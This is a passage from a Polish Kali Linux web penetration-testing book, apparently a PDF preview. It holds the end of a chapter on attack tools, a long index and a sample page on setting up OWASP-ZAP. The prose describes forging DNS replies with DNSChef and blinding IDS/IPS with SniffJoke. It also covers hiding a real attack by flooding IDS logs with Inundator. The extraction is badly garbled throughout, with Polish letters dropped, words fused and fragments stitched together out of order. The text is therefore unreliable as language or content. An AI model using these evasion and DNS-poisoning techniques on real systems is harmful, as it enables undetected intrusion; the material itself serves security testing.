Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 22: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

